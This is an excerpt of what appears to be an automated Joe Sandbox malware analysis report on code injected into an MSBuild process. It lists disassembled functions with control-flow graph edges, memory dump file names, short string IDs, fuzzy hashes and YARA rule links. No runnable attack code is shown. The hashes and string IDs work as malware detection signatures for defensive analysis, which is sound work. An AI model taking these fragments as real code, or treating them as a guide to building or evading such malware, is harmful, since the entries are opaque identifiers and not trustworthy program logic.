                          • Opcode Fuzzy Hash: b5b1540a6430294bbbcdb5c2376a5299f0ac682a493d872a4aa744eb77206265
                          • Instruction Fuzzy Hash: B09168317082504FDB1AAB389860A6F7FA6EFD6611F1545AED90ACB391DE34CC06C3A5
                          Function 02AE00B0 Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1129 2ae00b0-2ae00d3 1130 2ae00e4 1129->1130 1131 2ae00d5-2ae00e2 1129->1131 1132 2ae00e9-2ae00eb 1130->1132 1131->1132 1133 2ae0415-2ae0439 1132->1133 1134 2ae00f1 1132->1134 1145 2ae0440-2ae04f1 1133->1145 1135 2ae00fb-2ae0156 1134->1135 1141 2ae0158-2ae0170 1135->1141 1142 2ae0175-2ae0179 1135->1142 1158 2ae03e5-2ae0412 1141->1158 1143 2ae017b-2ae017f 1142->1143 1144 2ae01a8-2ae01ac 1142->1144 1146 2ae0195 1143->1146 1147 2ae0181-2ae018a 1143->1147 1149 2ae01ae-2ae01b2 1144->1149 1150 2ae0203-2ae0207 1144->1150 1153 2ae0198-2ae01a3 1146->1153 1151 2ae018c-2ae018f 1147->1151 1152 2ae0191 1147->1152 1155 2ae01c8 1149->1155 1156 2ae01b4-2ae01bd 1149->1156 1157 2ae020d-2ae0211 1150->1157 1150->1158 1160 2ae0193 1151->1160 1152->1160 1153->1158 1159 2ae01cb-2ae01da 1155->1159 1162 2ae01bf-2ae01c2 1156->1162 1163 2ae01c4 1156->1163 1164 2ae0222-2ae0226 1157->1164 1165 2ae0213-2ae021d 1157->1165 1177 2ae01dc-2ae01e5 1159->1177 1178 2ae01f0 1159->1178 1160->1153 1171 2ae01c6 1162->1171 1163->1171 1166 2ae023c 1164->1166 1167 2ae0228-2ae0231 1164->1167 1165->1158 1175 2ae023f-2ae0244 1166->1175 1172 2ae0238 1167->1172 1173 2ae0233-2ae0236 1167->1173 1171->1159 1176 2ae023a 1172->1176 1173->1176 1179 2ae0246-2ae0253 1175->1179 1180 2ae0255 1175->1180 1176->1175 1183 2ae01ec 1177->1183 1184 2ae01e7-2ae01ea 1177->1184 1186 2ae01f3-2ae01fe 1178->1186 1185 2ae025a-2ae025c 1179->1185 1180->1185 1187 2ae01ee 1183->1187 1184->1187 1185->1145 1188 2ae0262-2ae033a 1185->1188 1186->1158 1187->1186 1205 2ae033c-2ae034b 1188->1205 1206 2ae034d-2ae0355 1188->1206 1205->1206 1209 2ae035b-2ae0384 1205->1209 1206->1209 1209->1158
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: -$4'jq$XXjq$$jq
                          • API String ID: 0-1732080767
                          • Opcode ID: 4fe96be7d25d7aefcb57b45158485383719969fe4cb655f6962a000a82ef0e75
                          • Instruction ID: c4901b213eed22065031a5022d8d2b51e3c15ffcb0210860c8f92043531423be
                          • Opcode Fuzzy Hash: 4fe96be7d25d7aefcb57b45158485383719969fe4cb655f6962a000a82ef0e75
                          • Instruction Fuzzy Hash: D9B15E30A1060ACBDF14DF68D8807EDB7B1EF45304F108669D956BF255EFB0A98ACB51
                          Function 05AC5168 Relevance: 4.2, Strings: 3, Instructions: 495COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1349 5ac5168-5ac517a 1350 5ac526d-5ac5292 1349->1350 1351 5ac5180-5ac5184 1349->1351 1352 5ac5299-5ac536d 1350->1352 1351->1352 1353 5ac518a-5ac518e 1351->1353 1354 5ac5374-5ac5398 1352->1354 1353->1354 1355 5ac5194-5ac5199 1353->1355 1372 5ac539f-5ac541e 1354->1372 1357 5ac519b-5ac51b7 1355->1357 1358 5ac51c7-5ac51ca 1355->1358 1462 5ac51b9 call 5ac5408 1357->1462 1463 5ac51b9 call 5ac5168 1357->1463 1464 5ac51b9 call 5ac5130 1357->1464 1361 5ac51cc-5ac51d0 1358->1361 1362 5ac51f6-5ac5266 1358->1362 1365 5ac51e2-5ac51f3 1361->1365 1366 5ac51d2-5ac51d6 1361->1366 1362->1350 1364 5ac51bf-5ac51c4 1366->1365 1369 5ac51d8-5ac51dc 1366->1369 1369->1365 1369->1372 1397 5ac5450-5ac5452 1372->1397 1398 5ac5420-5ac5424 1372->1398 1401 5ac5455-5ac546e 1397->1401 1399 5ac543c-5ac5447 1398->1399 1400 5ac5426-5ac543a 1398->1400 1399->1397 1400->1397 1400->1399 1403 5ac54b7-5ac54ea 1401->1403 1404 5ac5470-5ac5480 1401->1404 1410 5ac54ec-5ac54f0 1403->1410 1411 5ac5530-5ac5555 1403->1411 1404->1401 1406 5ac5482-5ac548c 1404->1406 1406->1403 1408 5ac548e-5ac54b6 1406->1408 1413 5ac555c-5ac55a8 1410->1413 1414 5ac54f2-5ac5520 call 5ac5978 1410->1414 1411->1413 1428 5ac55ae-5ac55b8 1413->1428 1429 5ac5708-5ac572d 1413->1429 1426 5ac5526-5ac552d 1414->1426 1430 5ac55ba 1428->1430 1431 5ac55c2-5ac55c6 1428->1431 1434 5ac5734-5ac5758 1429->1434 1430->1431 1433 5ac55cc-5ac55d4 1431->1433 1431->1434 1435 5ac56f9-5ac5701 1433->1435 1436 5ac55da 1433->1436 1443 5ac575f-5ac5773 1434->1443 1435->1429 1436->1435 1438 5ac567d-5ac5683 1436->1438 1439 5ac55e1-5ac5600 1436->1439 1440 5ac5603-5ac5618 1436->1440 1438->1443 1444 5ac5689-5ac5697 1438->1444 1445 5ac5649-5ac567a 1440->1445 1446 5ac561a-5ac561e 1440->1446 1447 5ac56c8-5ac56f6 1444->1447 1448 5ac5699-5ac569d 1444->1448 1450 5ac5638-5ac5641 1446->1450 1451 5ac5620-5ac5636 1446->1451 1454 5ac569f-5ac56b5 1448->1454 1455 5ac56b7-5ac56c0 1448->1455 1450->1445 1451->1445 1451->1450 1454->1447 1454->1455 1455->1447 1462->1364 1463->1364 1464->1364
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$(nq$(nq
                          • API String ID: 0-1280547490
                          • Opcode ID: 68924d227f2fc51c5c80acc122ce401d592f1148780fa951bacc06629f5a0efe
                          • Instruction ID: c2c7eaeab4f36704b3914decf33c0295da2b14d801ebcafcb22acc6779c27c8f
                          • Opcode Fuzzy Hash: 68924d227f2fc51c5c80acc122ce401d592f1148780fa951bacc06629f5a0efe
                          • Instruction Fuzzy Hash: B302BB30B006158FDB18DF68C594A6EBBF2FF89300F14866DE94AD7790DA34E906CB94
                          Function 05AA7D18 Relevance: 4.2, Strings: 3, Instructions: 476COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1465 5aa7d18-5aa7d40 1467 5aa7d8e-5aa7d9c 1465->1467 1468 5aa7d42-5aa7d89 1465->1468 1469 5aa7dab 1467->1469 1470 5aa7d9e-5aa7da9 call 5aa4ca8 1467->1470 1515 5aa81e5-5aa81ec 1468->1515 1472 5aa7dad-5aa7db4 1469->1472 1470->1472 1475 5aa7dba-5aa7dbe 1472->1475 1476 5aa7e9d-5aa7ea1 1472->1476 1477 5aa81ed-5aa8215 1475->1477 1478 5aa7dc4-5aa7dc8 1475->1478 1480 5aa7ea3-5aa7eb2 call 5aa2e58 1476->1480 1481 5aa7ef7-5aa7f01 1476->1481 1488 5aa821c-5aa8246 1477->1488 1482 5aa7dda-5aa7e38 call 5aa49e8 call 5aa5450 1478->1482 1483 5aa7dca-5aa7dd4 1478->1483 1496 5aa7eb6-5aa7ebb 1480->1496 1484 5aa7f3a-5aa7f60 1481->1484 1485 5aa7f03-5aa7f12 call 5aa2628 1481->1485 1525 5aa82ab-5aa82d5 1482->1525 1526 5aa7e3e-5aa7e98 1482->1526 1483->1482 1483->1488 1509 5aa7f6d 1484->1509 1510 5aa7f62-5aa7f6b 1484->1510 1501 5aa7f18-5aa7f35 1485->1501 1502 5aa824e-5aa8264 1485->1502 1488->1502 1497 5aa7ebd-5aa7ef2 call 5aa7be8 1496->1497 1498 5aa7eb4 1496->1498 1497->1515 1498->1496 1501->1515 1528 5aa826c-5aa82a4 1502->1528 1517 5aa7f6f-5aa7f97 1509->1517 1510->1517 1533 5aa8068-5aa806c 1517->1533 1534 5aa7f9d-5aa7fb6 1517->1534 1535 5aa82df-5aa82e5 1525->1535 1536 5aa82d7-5aa82dd 1525->1536 1526->1515 1528->1525 1537 5aa806e-5aa8087 1533->1537 1538 5aa80e6-5aa80f0 1533->1538 1534->1533 1556 5aa7fbc-5aa7fcb call 5aa25c0 1534->1556 1536->1535 1541 5aa82e6-5aa8323 1536->1541 1537->1538 1565 5aa8089-5aa8098 call 5aa25c0 1537->1565 1542 5aa814d-5aa8156 1538->1542 1543 5aa80f2-5aa80fc 1538->1543 1545 5aa8158-5aa8186 call 5aa41e0 call 5aa4200 1542->1545 1546 5aa818e-5aa81db 1542->1546 1554 5aa80fe-5aa8100 1543->1554 1555 5aa8102-5aa8114 1543->1555 1545->1546 1572 5aa81e3 1546->1572 1560 5aa8116-5aa8118 1554->1560 1555->1560 1574 5aa7fcd-5aa7fd3 1556->1574 1575 5aa7fe3-5aa7ff8 1556->1575 1570 5aa811a-5aa811e 1560->1570 1571 5aa8146-5aa814b 1560->1571 1582 5aa809a-5aa80a0 1565->1582 1583 5aa80b0-5aa80bb 1565->1583 1577 5aa813c-5aa8141 call 5aa13c0 1570->1577 1578 5aa8120-5aa8139 1570->1578 1571->1542 1571->1543 1572->1515 1584 5aa7fd7-5aa7fd9 1574->1584 1585 5aa7fd5 1574->1585 1588 5aa7ffa-5aa8026 call 5aa3330 1575->1588 1589 5aa802c-5aa8035 1575->1589 1577->1571 1578->1577 1592 5aa80a2 1582->1592 1593 5aa80a4-5aa80a6 1582->1593 1583->1525 1594 5aa80c1-5aa80e4 1583->1594 1584->1575 1585->1575 1588->1528 1588->1589 1589->1525 1591 5aa803b-5aa8062 1589->1591 1591->1533 1591->1556 1592->1583 1593->1583 1594->1538 1594->1565
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hnq$Hnq$Hnq
                          • API String ID: 0-1699790779
                          • Opcode ID: acf477ab3c198a32d66094850c7a9eb3839aa28701e492b2717b3a2e7da109c0
                          • Instruction ID: cb42b9d53a3f6cfe1b7b86ea6423249748665e11ea4c2087b7f2a7aad88c97f2
                          • Opcode Fuzzy Hash: acf477ab3c198a32d66094850c7a9eb3839aa28701e492b2717b3a2e7da109c0
                          • Instruction Fuzzy Hash: FA126B31A002158FDB28DFA5D984AAEBBF6FF88300F14852DE5169B355DB35EC4ACB50
                          Function 05AA99D8 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1744 5aa99d8-5aa9a15 call 5aa9f98 1746 5aa9a37-5aa9a4d call 5aa97e0 1744->1746 1747 5aa9a17-5aa9a1a 1744->1747 1753 5aa9dc3-5aa9dd7 1746->1753 1754 5aa9a53-5aa9a5f 1746->1754 1863 5aa9a1c call 5aaa348 1747->1863 1864 5aa9a1c call 5aaa2e2 1747->1864 1865 5aa9a1c call 5aaa2f0 1747->1865 1749 5aa9a22-5aa9a24 1749->1746 1751 5aa9a26-5aa9a2e 1749->1751 1751->1746 1764 5aa9e17-5aa9e20 1753->1764 1755 5aa9b90-5aa9b97 1754->1755 1756 5aa9a65-5aa9a68 1754->1756 1759 5aa9b9d-5aa9ba6 1755->1759 1760 5aa9cc6-5aa9d00 call 5aa91e8 1755->1760 1757 5aa9a6b-5aa9a74 1756->1757 1762 5aa9a7a-5aa9a8e 1757->1762 1763 5aa9eb8 1757->1763 1759->1760 1765 5aa9bac-5aa9cb8 call 5aa91e8 call 5aa9778 call 5aa91e8 1759->1765 1858 5aa9d03 call 5aab8c8 1760->1858 1859 5aa9d03 call 5aab8d8 1760->1859 1778 5aa9b80-5aa9b8a 1762->1778 1779 5aa9a94-5aa9b29 call 5aa97e0 * 2 call 5aa91e8 call 5aa9778 call 5aa9820 call 5aa98c8 call 5aa9930 1762->1779 1767 5aa9ebd-5aa9ec1 1763->1767 1768 5aa9e22-5aa9e29 1764->1768 1769 5aa9de5-5aa9dee 1764->1769 1855 5aa9cba 1765->1855 1856 5aa9cc3-5aa9cc4 1765->1856 1775 5aa9ecc 1767->1775 1776 5aa9ec3 1767->1776 1772 5aa9e2b-5aa9e6e call 5aa91e8 1768->1772 1773 5aa9e77-5aa9e7e 1768->1773 1769->1763 1771 5aa9df4-5aa9e06 1769->1771 1791 5aa9e08-5aa9e0d 1771->1791 1792 5aa9e16 1771->1792 1772->1773 1780 5aa9ea3-5aa9eb6 1773->1780 1781 5aa9e80-5aa9e90 1773->1781 1787 5aa9ecd 1775->1787 1776->1775 1778->1755 1778->1757 1836 5aa9b2b-5aa9b43 call 5aa98c8 call 5aa91e8 call 5aa9498 1779->1836 1837 5aa9b48-5aa9b7b call 5aa9930 1779->1837 1780->1767 1781->1780 1794 5aa9e92-5aa9e9a 1781->1794 1787->1787 1861 5aa9e10 call 5aac068 1791->1861 1862 5aa9e10 call 5aac078 1791->1862 1792->1764 1794->1780 1803 5aa9d09-5aa9d2a 1811 5aa9d35-5aa9dba call 5aa91e8 1803->1811 1811->1753 1836->1837 1837->1778 1855->1856 1856->1760 1858->1803 1859->1803 1861->1792 1862->1792 1863->1749 1864->1749 1865->1749
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$4'jq
                          • API String ID: 0-3078559419
                          • Opcode ID: 6196226284afad0ef12addf48d4d917c91c3963272bbebe728bb2e97ec0081c1
                          • Instruction ID: 62b5cf8b85b190bbacbd3736145c74fd49ca5cd91c82e2151614f5a121b01547
                          • Opcode Fuzzy Hash: 6196226284afad0ef12addf48d4d917c91c3963272bbebe728bb2e97ec0081c1
                          • Instruction Fuzzy Hash: 5AF1B835A10218DFDB04DFA4D998E9EBBB2FF88301F118159E406AB3A5DB71ED42CB50
                          Function 05AADE12 Relevance: 4.1, Strings: 3, Instructions: 359COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1866 5aade12-5aade30 1867 5aadf49-5aadf6e 1866->1867 1868 5aade36-5aade3a 1866->1868 1870 5aadf75-5aadf9a 1867->1870 1869 5aade40-5aade49 1868->1869 1868->1870 1871 5aade4f-5aade76 1869->1871 1872 5aadfa1-5aadfd7 1869->1872 1870->1872 1883 5aadf3e-5aadf48 1871->1883 1884 5aade7c-5aade7e 1871->1884 1889 5aadfde-5aae034 1872->1889 1885 5aade9f-5aadea1 1884->1885 1886 5aade80-5aade83 1884->1886 1890 5aadea4-5aadea8 1885->1890 1888 5aade89-5aade93 1886->1888 1886->1889 1888->1889 1891 5aade99-5aade9d 1888->1891 1905 5aae058-5aae06f 1889->1905 1906 5aae036-5aae04a call 5aae2e8 1889->1906 1893 5aadeaa-5aadeb9 1890->1893 1894 5aadf09-5aadf15 1890->1894 1891->1885 1891->1890 1893->1889 1901 5aadebf-5aadf06 call 5aa13f0 1893->1901 1894->1889 1895 5aadf1b-5aadf38 call 5aa13f0 1894->1895 1895->1883 1895->1884 1901->1894 1914 5aae15f-5aae16f 1905->1914 1915 5aae075-5aae15a call 5aa97e0 call 5aa91e8 call 5aad380 call 5aa91e8 call 5aa9820 call 5aac740 call 5aa91e8 call 5aab8d8 call 5aaa088 1905->1915 1985 5aae04d call 5aae3a8 1906->1985 1986 5aae04d call 5aae398 1906->1986 1987 5aae04d call 5aae692 1906->1987 1988 5aae04d call 5aae530 1906->1988 1912 5aae053 1916 5aae281-5aae28c 1912->1916 1926 5aae25c-5aae278 call 5aa91e8 1914->1926 1927 5aae175-5aae24e call 5aa97e0 * 2 call 5aa9f98 call 5aa91e8 call 5aad380 call 5aa91e8 call 5aa9498 call 5aa9930 call 5aa91e8 1914->1927 1915->1914 1923 5aae2bb-5aae2dc call 5aa9930 1916->1923 1924 5aae28e-5aae29e 1916->1924 1937 5aae2ae-5aae2b6 call 5aaa088 1924->1937 1938 5aae2a0-5aae2a6 1924->1938 1926->1916 1981 5aae259 1927->1981 1982 5aae250 1927->1982 1937->1923 1938->1937 1981->1926 1982->1981 1985->1912 1986->1912 1987->1912 1988->1912
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$(nq$Hnq
                          • API String ID: 0-1151833592
                          • Opcode ID: 61a4f73780ff5aead87d7e8347ced88f2fcc3e3bb55154257a37e43e683b24a7
                          • Instruction ID: e809c814899d10eaf4f34a11cded0cc1fe34f42516448504ef7cb2e729291ad7
                          • Opcode Fuzzy Hash: 61a4f73780ff5aead87d7e8347ced88f2fcc3e3bb55154257a37e43e683b24a7
                          • Instruction Fuzzy Hash: 21E10F35A00209DFCB18DF64D594DAEBBB6FF89300F118569E806AB365DB30ED46CB91
                          Function 05AC48C0 Relevance: 3.8, Strings: 3, Instructions: 78COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1989 5ac48c0-5ac48ea 1990 5ac48ef-5ac48f2 1989->1990 1991 5ac490c-5ac4932 1990->1991 1992 5ac48f4 1990->1992 2000 5ac493b 1991->2000 2001 5ac4934 1991->2001 1992->1991 1993 5ac498c-5ac49b8 1992->1993 1994 5ac49be 1992->1994 1995 5ac48fb-5ac4906 1992->1995 1996 5ac49c3-5ac49ca 1992->1996 2004 5ac49ba-5ac49bc 1993->2004 2005 5ac4980-5ac4983 1993->2005 1994->1996 1995->1990 1997 5ac4908-5ac490a 1995->1997 1997->1990 2003 5ac4943-5ac495b call 5ac49e8 2000->2003 2001->2000 2006 5ac4961-5ac496c 2003->2006 2004->2005 2005->1993 2007 5ac4985 2005->2007 2006->1996 2006->2005 2007->1993 2007->1994
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: U$xnq$c4
                          • API String ID: 0-264055591
                          • Opcode ID: 40005e81cacc91e1082d13c099916c858dc04920279bf553c29067e583a850f0
                          • Instruction ID: cd3f62ec4acffcd63e40d98644a5d085d3ef0f3ebc1aff97dbfac07d73339fdf
                          • Opcode Fuzzy Hash: 40005e81cacc91e1082d13c099916c858dc04920279bf553c29067e583a850f0
                          • Instruction Fuzzy Hash: 7A318E34A042149FDF18DFA9E450FAEBFF6FB4C311F10816AE515AB284D730A845CB95
                          Function 05AC969F Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2010 5ac969f-5ac96c3 2011 5ac96c8-5ac96d5 call 5ac9933 2010->2011 2012 5ac9750-5ac97a0 call 5ac9600 2010->2012 2013 5ac96db-5ac9748 2011->2013 2012->2011
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: foq$ foq$4'jq
                          • API String ID: 0-1996121179
                          • Opcode ID: 0d034d4b09bd543bbf8b625b42280efcadb6077e73471e0f1e59ffac2cdfe481
                          • Instruction ID: e82439f98822b5e7e3be28323425f8c85f36922b98c1e0785e83ee739fa0d539
                          • Opcode Fuzzy Hash: 0d034d4b09bd543bbf8b625b42280efcadb6077e73471e0f1e59ffac2cdfe481
                          • Instruction Fuzzy Hash: 4C215E30A0511EDFDB08EFA9E5409AEBFB6FF84300F5045AED416A72A4DF706A15CB91
                          Function 05AC96B0 Relevance: 3.8, Strings: 3, Instructions: 66COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2038 5ac96b0-5ac97a0 call 5ac9933 call 5ac9600 2061 5ac96db-5ac9748 2038->2061
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: foq$ foq$4'jq
                          • API String ID: 0-1996121179
                          • Opcode ID: cd514749d7010ceed2c0dd366a05f527d03b0c9c923c4e4273c145cfd2dc507d
                          • Instruction ID: 3373904578588be54eb9431bd53f1476cad236726df185ba4970f53f3a5cd52d
                          • Opcode Fuzzy Hash: cd514749d7010ceed2c0dd366a05f527d03b0c9c923c4e4273c145cfd2dc507d
                          • Instruction Fuzzy Hash: CC213D30A0511EDFDB08EFA9E5409BEBBB6FF84300F5046ADD416A72A4DF706A05CB91
                          Function 05900B28 Relevance: 3.8, Strings: 2, Instructions: 1291COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq
                          • API String ID: 0-1204115232
                          • Opcode ID: a3a59bb4bdc99db94bccf24a95ad09d35b8caaeded05c8bd96172a637c815b3e
                          • Instruction ID: 05507f6607792920d5a8bc96cf366b303e6f016739542a89b317afa7f89436af
                          • Opcode Fuzzy Hash: a3a59bb4bdc99db94bccf24a95ad09d35b8caaeded05c8bd96172a637c815b3e
                          • Instruction Fuzzy Hash: E3928030B20225CF8BA85A69599823E75EFBFC4750B546C2ADD07DB3C8DE748C41D791
                          Function 0651D3C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0651D44B
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2357012271.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6510000_MSBuild.jbxd
                          Similarity
                          • API ID: CallbackDispatcherUser
                          • String ID: 4'jq
                          • API String ID: 2492992576-3676250632
                          • Opcode ID: ccfdb7e124b6df09e84413b1ac62d20904b1f8a05ff15ebf0ef2cccd4d9e616e
                          • Instruction ID: 647c4b6852759d7e1efb114fb6eb48ac00010ba77aeee5177a37c826e9a45995
                          • Opcode Fuzzy Hash: ccfdb7e124b6df09e84413b1ac62d20904b1f8a05ff15ebf0ef2cccd4d9e616e
                          • Instruction Fuzzy Hash: 7F2137B090025A8FDB14DFA9D9456EEBBF8FB08310F10861AD469B7380C7B86944CFA1
                          Function 05AA3678 Relevance: 3.0, Strings: 2, Instructions: 519COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: $jq$$jq
                          • API String ID: 0-3720491408
                          • Opcode ID: 89efa4d6714d87045b198259eb9302993fc57dce5c75b76f6d8b802bd2afaf4e
                          • Instruction ID: 796e6c09a11f21642f82aaaa00e29fc757c3c6b78e41f6dcd79e4e534ab9e54a
                          • Opcode Fuzzy Hash: 89efa4d6714d87045b198259eb9302993fc57dce5c75b76f6d8b802bd2afaf4e
                          • Instruction Fuzzy Hash: 76226A36A002598FCF15DFA5D954EAEBBB2FF48300F148816E852AB394DB74AD46CF50
                          Function 05AA77D0 Relevance: 2.8, Strings: 2, Instructions: 337COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$d
                          • API String ID: 0-2356140993
                          • Opcode ID: ecbebd5c6ca1959af0d3c4cc7165b8c348bed2c6df94313dacc55b18ad9ea14d
                          • Instruction ID: 722ec955a241ffa2141f148d31a5ab5c92cd6093400eaa8768e71622f58e3172
                          • Opcode Fuzzy Hash: ecbebd5c6ca1959af0d3c4cc7165b8c348bed2c6df94313dacc55b18ad9ea14d
                          • Instruction Fuzzy Hash: 73D155327006068FCB14CF29D584D6BBBF2FF88310B15C969D85A9B269DB30F946CB90
                          Function 05AAF800 Relevance: 2.8, Strings: 2, Instructions: 289COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq
                          • API String ID: 0-1204115232
                          • Opcode ID: 8aec87bb466d80ad33b3b6a4614905cceabbe8772c9b05a7aef03c9b7729c420
                          • Instruction ID: a335e0a569ae37ff3d4796bb935ebedc59c0a86020f75cf2873c576e3b7915e7
                          • Opcode Fuzzy Hash: 8aec87bb466d80ad33b3b6a4614905cceabbe8772c9b05a7aef03c9b7729c420
                          • Instruction Fuzzy Hash: 49C1A975B00218DFDB08DFA8C994EADB7B6FF89300F504169E506AB3A5DB71AC42CB50
                          Function 05901BC8 Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq
                          • API String ID: 0-1204115232
                          • Opcode ID: 92b254c0943b6e949616176857c7ab382fd30972266376dcd427c7a74bf8e926
                          • Instruction ID: 1c44e9d2819a79606a16ec906b2307ea357158a650f7be0fb5267eb20b43f0cd
                          • Opcode Fuzzy Hash: 92b254c0943b6e949616176857c7ab382fd30972266376dcd427c7a74bf8e926
                          • Instruction Fuzzy Hash: F3911830B201218F4F69673469AC53D39EBBBC96653542D19EE03DB3C4EF799C42A781
                          Function 05AAF7F0 Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq
                          • API String ID: 0-1204115232
                          • Opcode ID: 4f83153095104a4e0881ebe838813da2fe203e7a73202c5c5abd9ac3d9a01779
                          • Instruction ID: 79382ccfb80808a0c3aba0e6db78ec471f265c0c049d3232bba54e5b3bece8d4
                          • Opcode Fuzzy Hash: 4f83153095104a4e0881ebe838813da2fe203e7a73202c5c5abd9ac3d9a01779
                          • Instruction Fuzzy Hash: F0B1A975B00218DFDB08DFA8C994EADB7B6BF89300F504169E506AB3A5DB71ED42CB50
                          Function 05AA2C58 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$Hnq
                          • API String ID: 0-3116299003
                          • Opcode ID: 7aea8a1280bcdb979396de495c8f3ab3d2516e3b1823db9182cda077b881fb6a
                          • Instruction ID: 68ec78dacd389dec35827859e4efaa51de4d1868bb534fe055b79e30e280a285
                          • Opcode Fuzzy Hash: 7aea8a1280bcdb979396de495c8f3ab3d2516e3b1823db9182cda077b881fb6a
